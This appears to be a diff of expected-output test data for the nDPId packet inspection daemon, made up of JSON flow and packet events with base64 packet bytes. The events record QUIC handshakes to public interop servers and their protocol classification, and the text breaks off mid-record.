00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1603816434587,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434587,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA73RAAEARuC\/AqAGAwb4KYucjEVEE7DgFzwoKCgoIOPxKwZ+D2JAAAETS91nHeEtqNVprqBpjlBuMS4qDhd3kUN8qDrM+F\/ekloYAYgcZUMLt8kdbAj4yNgXM150XEsSqUaY2u+NNo8mFZEwXy2OnYTv\/L1pA2ooV9c\/qfb6IQtVvpkYCa79kPBP0tyFMp4w86ypVGLJRFE2wcR8W+ufL4zQbFmHQUN4s8EKBgftF0IZ9d+hGzrCohfVKAmj2TbAATwLc5qROqnCXSPAAIwsgXC6FvxeRe5C81GzRnEFcVKohNWvuH+YgU\/EQzJ8x0h2o1KXN+x2kz8nNm4RV\/bBgatrr3rE9I9H9H7X4vNkwSkPN1LE\/7YLaXxFkeX+BvfHM9pLsCwVYI43jNMZK\/82M5vqAJwLAoGNaMNRy1bvSqZ2Qnqs8doUi12HdtkWRB7hy4DLBCO6i\/WKQJjLKdpFeD7phx\/6P3mBKcjDeMOT9LGfsfpWDEggtVg0K+PNic2DC+MGaabHUIfDeFXxZwVJQjnBWnr7uiJ1+uGYObevmoi83q\/oHGzH2zJ45l2SHUS8N5EDtYU7jRJ0C0k352go\/BLzWhvpxttBJ0HkbJN+Lf8iGQ7\/HNrO0sSvxhBlXfXloOUmwXwy4ZOiFy754b5M3BhRivvL68fxBqtVY1N2wA1osEboLNfPnmjiBhXxUugq2mfHLbsnTaxih+guwrlRqVVQng52RQJYpjyC\/IQpqxIgm\/p+tg8gZMclfhCysFzs0Sx7c51U8U\/eV6RVzg4J9aZi1F6t1E9qqrDD9rTgXDBFK+53U4dmwwrA3ilycimT\/hbzORA3BufMgHAOtz3cpn\/t7KLfrocmCHydxweYPjYv8od0eN7GuRZC\/Dkkx5pLEApXJKbDycSs4W77Wi8NgAqHOpGnI10QBHXyfFP+YPX\/MbUtvkqyBKvQeesidGlYsUe0gYlnKX1yYRVG\/iKS0PMJZC3FHvFiL6obiVGRuwwpTV3d7lkotBNp2jqZCw1NLWglC1fuu1coZsHS72tmzKvcBFgtdmqwenN1JrK8F5rdOVfBQ8yE66XD3W8yAjlz\/Qvq\/DIB7QOU2zYdRo\/xweEsuV1v5VGk+8J0AJw0wbBWw2a7KJD1o3bx\/fl3Fi0jbHAOf1Fon8qpBSfuKwo0q4+YMAnbX13uRf4o0syD1YOszGCYMMZmBO0q\/PYK7xkQl3CoFVjP6bHq4sVQrk6j7MBPS838Z1ManSJBz3k+oiO\/sknlDJhNUIHfSq8TgRjn5JEi1pn2KhrqsPoB73ZpXqkfBB7bu8rzkBoJrWwjjZeFkHJOfD8ToexbXz43k\/IjggUNPy2WSLw1q33LeO+gOH5GXB9\/QgYQ697NrQKVyKlRVZXeNUwnQS4zycuS8PuKHeqfdW9Z+9PEo4DpPFRu+B7BfvVgxbF3wCCeyZwvtKZFkAMhl54zHOUC4V5hgvug19KxTuTtQDyeR7SJbTf3aDyi+uN2eX72\/wUD5r\/K2ChPZ9Gse97JUpH8JYVHPwSDEUEO85gNWGwO2wDrwXcE1X7p+U2f6nsA1R+bUBz04uvKlIU4Sa3pHvuKQRjh6XPQ2ThEX3UW558Xx7NikbDf\/f1LNSL9NCOFEeMnTLHFDcVVOXK5I01l4ewmR2fHvlVQvWH\/bOr5xDcwdY+kNlEO6n\/7tlWOai8jsYPqutA=="} -01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434587,"flow_last_seen":1603816434587,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434587,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1603816434590,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434590,"pkt":"pJGxgjQ5PKn0qB\/sht1gCk\/uBNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABizsRUQTY3hvBCgoKCgg1RfSbShWYtQAARL7tTf7Q3DPhiEmC4nM7FyCePUSXuhX\/xJUKDzdA3Dndh7i7AZ7IYGRP1Yj0EuU9mm9YXASeUAKarL7NfQFkziaDEWFlefwq8ZzHKOgKpSqZeoocfYxvZJ8CSRvYoWz\/L6jmv6jaQeOLENERntb1qDtsRo5+v992QGLT9TUEMVkwT2FvUb5KMSqTvrwWgkM2hgSTV4EyBe1D3gc0yLlWmSFz3jz3ijFR560nQwOMUo4q8F8wUAgTdOAVJvBGKThzf\/CoAwD57myBv4uKJMnypuTatEvPlB46uv\/yty2eheod7+0rebXxYj4Uc+UqPb9wT8PhoyG868QW5UmJx34aYK7eN3JuR15+ImKbVmoE6EL83PSKYkHyQopRIotBEKQDm+GsSi14PMbpT\/MRFwhAVJ+sQdlkceub2KUXDJHao+eBA5w8vGU2OKSHGw6MFHU+N+USgIVLGu8C0b2WNKFbDS9r1lqcSYhWRSXCnwTaP8cP1GWArgqHq4NJrJMJXD+xs1H+vApBkOM\/ZeUAGUAtTfkrI5gOusV9oUnq2ItgMvR76a8xKxY\/SiVzw7ucrWK5N2tQ5JkPI\/NGcIpsYWE01h06TOMdCUToNwiJfkP0MPn3vMz2JyLbhE71KWygYVxZlHissMIrLNj2hzs1t4mgi8Dfs0l9RtozbB15+zjCqfBYkvDNCXVfu0MO1trH5LQH40Myn9bZeAAzq9F2i07k2zD6tl2iozB832XjSA\/tFg7fJub\/mksvHDenolmTIZGI4wO5Z3NTh426m1Xr55i+p\/4y\/Q9IBI2x3X4SBvQZun3kWH6dWj67baJqzcocTD7LnXnDRN2eJnB0+m+Xkg+SR2CQD8FNHBCSnN7Yu9TN7g85clS9FrvmkHqNboNkc2KyQf9kCWlFhRrzo5YX6fx357\/JlHGWmF2cH2EDuHHJfgxwA9G7HuV2intBnLuQm+sJuJfIh6mRTKTYdC1aBxO+FJkXatzCzuj936XOJG7cJwInBtGXzIe7oIez0hn4nIWhuMBVQhhszVOH9hqsvsKAdbnYUdNA1USW6D7R\/xmghiopDfGtjIWLxZREthLkrTZvJPOso30GmJwYCSy+9OZoV2Nj47lGe912feEm235ruyUlWsQTuKpfyC8J7r+SbB5tplBhKbatYRidI3hpJ2q8lvOUBcxy5jvAvjqVG768S0brsL7G6C2TqvMZt\/zTMuDkIHPjWiNDebCJ\/p2a5kYJOC4jhcbwjh\/tz0WznkGbQNVpLag1ovorvXAKpAYOP3LJnhQhOOuZLuZrJxyhVrae9z9d1NLFL8OUzD\/ZclBspPNm3p1e1A75CP6tZBmrEoDhbY1SV4p4vv10\/MMVCqO2nZs0ov\/lFT0sC7weM0SiUoUILcoLsraaHxz2srKVBtLbHRHf5VErVRNyjOmGUC3wJs6R34sc\/8zeM+d6HZcDlUk9ii7+g55y3G7oiGyj1ls\/gUdh7+ZhHGeX9MFF\/5EajWroXTez4lAWvOzswVIh9B6VOueE+IAtyKSx63VOgxYY7yYRidJ+wxQsHNXarhpUCSPeTmkyBv4qdWIHzyXgiUcAahzyxWMUHmvyy0MueTnQQdoRS92QfxncoT12pzPDDw=="} -01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01021{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434590,"flow_last_seen":1603816434590,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434590,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00640{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1603816434595,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434595,"pkt":"pJGxgjQ5PKn0qB\/sht1gBnpkBNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRU25URUQTYvvrACgoKCgj9UoceU8iiQAAARL7az3aryiG\/WW4QSFw5q8b+\/qI9una68JfIBN5RDAlSWxI5aN9NrGnm63U\/Z5hZqT855BEAbzFsnSq9T5UoQJSQWJO+OxKLmuziQZO7srez1fkkDupTN1wkkdnmywDXZcMkFQ4tXNVtGsfMIyPoMOjkuNgYuL+TrFwg96COI8IOfhzUGRFJf8K8t+t3YLfMWc5IM3WJ\/phaCjLWvabCUhYVrFgZVTenSIvn8FoTPxqo1m1xa4G3n8d3o2zFUc4XDalUQSYfIsGCZ\/3VGNAlkjuVi1uuzvCOp0qJEHMlsJ6OjaNJzjSj1b5X311lbaXLxEgAACVJ7mOpBMH2eUKlimPQIRjgO8DFiVT1VtetHEHo7XxD9z9DaojFHhQILu9Ndy7QJYx+8OxPwi0k7EQtFKIeO3QhbI3teT8NwQXlJnQv\/J7yzTNnMCu3L9LWIn6C92d5qUB+1utWZXR28cNynLbRjuRNINQIzfTFmS9iOpbZglrT\/GnsqhcaOJm2t9XrSu4yCE5z0c4wHo6GnMAN05DOXBY0yYPljkh7vr4aKEDxXsaCMcwmcWxYnUlFep8Gex3JVoSlUGz95+zuvHb46+MC+XDiipznc431Qn7rrxOB6lgYcTG7kLf\/ZmPHxmDGAINfIYtZO7xiSc5JWwhUA4ikdzTJaE0uo\/HCIsdSFQFJJlEXfiQ6f+9Lg4o4oHt\/v4TQTOThiS8hA3g+cEIozsYToLOF02tEqrwi5BbfszIjeKKW+XlfuQgTXnd+fgE5dAu5Oc7BakCjmnGBb3Uz3ugNj5DTo6+ojP6UY2IU771P\/fqTADAKhT3onheWYJvxAkrQZHLnIxcgu5DA\/5Es1ztGUo\/es0BosHYusWos2FbBdJpxb+gu5rvMEmPCkuCIpZpBZLLug0rWMitGXgJfX9MWvPAjBWdKWTbvcBzKFwh5+\/1ocEXw0VaT+NsU2weQMCO1YYpPIlc+42jUQfCx0zKYejhkxNEoAo38Q29iwZcFALT5rf0jYyMQpMUMcNFQQqqzbrcaHvvgWQzH+lUkFSqbhBqtX5WCPuLWxkDb\/9GhQLNx0Q1IujSYwA1SIvLeb9bsrMAWKENc82M+Wwn3RcXpJ4cDa0hrN+3NcY\/5t1ve6RDek\/0oY6QGGW1JE\/CmiO8t+4Q02FuHroDarDyPM4tHJeLOT2NE6bUo4WRjaSNVu5ng0Eq9X3XBmx0Ikdv91XlzFM87UC5R3r52ZTZNTnO+xLkNyA4Cub32cJnhUFmGLoaAmiMCxezGxr9YUy9YTVqutoTlfA5jfzAmMWcvfXhM8IAoJ7O2szD5hCSuJ8MX3ML7TFR9jrMTogwqPbeDECUgOiFmruVR0+GuDJb2riqtAhc7PvwbnCVPAYbBoyaoy31mi2TG71Wi\/w4IaZaos63DgLgXPzRaSbjG1c2zVPlGYLiTfXzEyhvOk3Mv8aR0DqJ\/gqVm0SvfiOZnBGk5gzICSopKt52HHnW1EwSPCiNSbMh18YFppr0G1bbAe15xP1\/\/Pk0jzR\/wXBG5JS37im5z+jqUQpnV5dcnvgYoRjpgGuTxRGXLjRfoOGzSlFstUpRTF+iEOL+rt3XO56SlECJkrsnzQoo2ccoM5Hgg7A=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434595,"flow_last_seen":1603816434595,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434595,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00649{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02147{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1603816434599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434599,"pkt":"pJGxgjQ5PKn0qB\/sht1gBgPLBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPy3ARUgTYU5HKCgoKCgjzn\/uzo5TjaQAARL4oIwXE1bV3X2RQF+ON3RTsnJX4an3jVlQ7KRPGPw\/cd1gZtN4yjes7ivlyOcq2vm957CNTb4Z32AWph+bIp0qE95znKWOclgtBgRpaMvlLDlaUbTJ1Kjqhg7PudTMGHo8kc8ERMms7zx2J4fSxALfbKS3w04Pkl3fNYWkwJZG9jA2z+7UujsQZ2YxzLHhbiMSZctmG+MqTnAcyQxUOVqOLFrLaBhAxisgQ5MezG68hwcDBiS0ypz8ByM9sY1JtZ4VMrD6ux21WiJ\/gTvOv91V5Grp5XnTWdbnNLG7GrfS3jGjTn2Un\/r3WCKJ0WajhNLHmPUR9BFLSVFG5JiyNgIWA0\/HgJTXD99jRhJkBHyvLeL3j9ePlCvGQ9KCY7A+MdgP5+hrP1QLH82VspHtB2VvSSvMREFxd8jKlKrGybrolBflILJX4GGJlg2hWcC+HeiZGufy5yPCOCbIVpSVQOMyBBe\/Ph0aL\/4q+E+2qJVdBHso12q7ZRf3KyV6KD\/C8p1m5HJ5lk4kmjjCsWakG5crp0wLCKMw1zK5GEWknO8UExqKvojXXFzU2Be74eZgjrj394KHSeeH524syPc8swoO75W7hTdsrJB\/rbuBB+sKBiDCauvTcD0r\/ZL2kwgN2l\/QahiKQcXG7cPXaL3PMAV+\/0HhLKSqjypOevG9iWlPhJOE9CkOrIJqW9G8TK1GKGdKLlPqAZLZ9m71TcFKjQ2zo2h9JsVhhsxqsVTUojf9bVe63KowZvJiNw7kbG5Dx9zv3qk76Scw0pW+2ZZHPjdRZTjmKSA5Y+PYOoxxOicDP9ZVOp+8YwJbnh4YepP36tZkoI4e5hYmgEwZOjt6Yo4GxIrGzuNcUfaa96FJIqS3n0i7MAiXzBsvTUSDnlPJz08s7uoWN3Db9JOSBxZX5qHn+WlZCt6oEKkU8FdQI+7reYK7AI5cK+7Fg6zvWA0dR4F7VGaHhGDIqy3gLf7KmEEyWYRoePUORLvgVC8XTilGAf6Bjlqx9PRGxm0Ja\/4HplWikLpRAYamguRrJONKI6nEhSn9lO27tMAcOTn8Tf6RTu95+ny6hbgPd\/mMKokSGNF7UUtZjCk6cbVH3J7cHgGQXOTjQysmlrFxV2bF8LUmKKxWDOYfmVKmHvf7ramU2h+1zK66w6qsQI2OFBYV6F\/QBKPRxAQlchq5r5kgySGLxmw3m6+Sf6hz7sbVIbyNA36ENRVuZXdVSayaI5VXU677nJtG12s5uEZtWJqnu3YVN\/KK+kE1AeI06S1byEfRfdS5qQoFDC+c6GGJFo5dVEZxLnoVZC3EhBh7dWvLthE6jKMd3CbXVgnSRl9JPjiWwsbn7FBHeycKSDuew5OQ1HtZpeRUJUk5nMgSUOUI0YZ50IJIEFtw5YNao7Ddw10e\/\/nmynctyewik6Tvc8zLrSWaSqgViA6i2PaP6Pv2MZCMyK\/X3XqMdRGKXZs\/jr8\/dMBZX3F\/DYmeMdlamiU1RcDJHP8r+9yBXO9yUXOhN7Pnl31zJ6vG4vR0yXekz\/kuQnX3VMYt3WopVdGtyLE43Smp\/Tz11cx6MymTg0YsqpJ+vSsiBwEm1Kebt\/+JMBAhlGhj5jM9y3tuD9xf5ApCnIw=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434599,"flow_last_seen":1603816434599,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434599,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1603816434599,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434599,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8YxAAEAREMXAqAGAR8opqZMdEVEE7ChGywoKCgoIqaWx\/UJ+JLQAAETSRegWnRcPLKk7uYLS8VZ6A+zIwJb1mPqvy2MKL3Tt2jbz4sn5hDNSysWyy0Q1vrUZJyUEmOGV1jj\/0B2GZUMMnU+bx4P64TDztfWRCEsX9xqURkrteqGz6ltOPoTMK6uGDuQl8788DuRU6AkQ1v9y\/IX5DuObM3NrRxVsTfrPVsxKWrlvhhc8+bzP4RcGvyJ\/YYHHHWv8RiMZV8ZiNqzD\/Tz+RFWP04TpQ4H0wJGgAkCU7iYd4ab1bDvSCbzjD468MBlMvdV6E9+6rcgmFKBMzQQdE+3VD+cPof5Frq5N6HQby2yYtJudG6NrUX73fAa2KQZnzYR4AbsJmaaX8pjzhRDzDU9lkoPYf4Oc4\/nC0DEA60ezuIdY6ti8wvtU78brnoSIwXQNufJ3MzKMZWZJpg9zM9qPOZYsquFKurbo78k5\/rJeEvIak8OZ1yOE2HfW77PYo2g+KEWaP\/fvQAQmwoeHxVcoRheC4X\/2hnLsZC4VDGWTctTohPZkhIIguZevQcdGStgdNPOoe23oCG+cigtTE2XZqR98GoabuEhLVpX8IFbc399f2Ed3R9zv0BqRW7l9W+VGBCK8l7hYQJcjAGrqb6UxP9n5twWwwy63e4tac05Mv3YxsBf\/gpWY1CeGoH4A3AOIfnYfHjCBkCKDei184tAdAwJXAV8xwNIvdB1dw3Mc68J\/Pfqo1EfLZjZfaNqOe3f8viMQO4rriT8gdNtZ0CgbJJiTTs0v3CCooFyBSmtQOJYSnaqzYT+uTl0hY8Pv7OC+YTEfEJsGmbz3bNDq8LTl15HzHDF6\/S0tKU8O8InGVtk\/4xlinam6Cr3IODbyJ4bhBkIKy8MFcG+qdHGW4VYXvs5ZK3HFwh9xB\/co3gy3WkEyPgUxAVTluIvDqC8K6I1